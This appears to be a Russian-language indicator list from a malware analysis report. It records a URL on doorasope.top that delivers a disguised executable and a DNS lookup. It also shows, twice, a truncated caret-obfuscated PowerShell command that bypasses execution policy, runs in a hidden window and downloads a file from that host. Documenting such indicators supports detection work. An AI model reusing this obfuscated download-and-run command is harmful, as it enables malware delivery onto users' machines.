Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^We^RS^heLL.e^xe -^e^xECu^Ti^onpO^liC^Y B^y^pA^Ss -n^OproFiLe^ -^w^i^N^DOWSt^y^l^e Hi^DDen (n^ew-o^B^jec^t^ ^syst^eM^.^NEt.W^eBCl^ient^).dOWN^LoadfiL^E^(^'http://www.doorasope...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pO^We^RS^heLL.e^xe -^e^xECu^Ti^onpO^liC^Y B^y^pA^Ss -n^OproFiLe^ -^w^i^N^DOWSt^y^l^e Hi^DDen (n^ew-o^B^jec^t^ ^syst^eM^.^NEt.W^eBCl^ient^).dOWN^LoadfiL^E^(^'http://www.doorasope...' (со скрытым окном)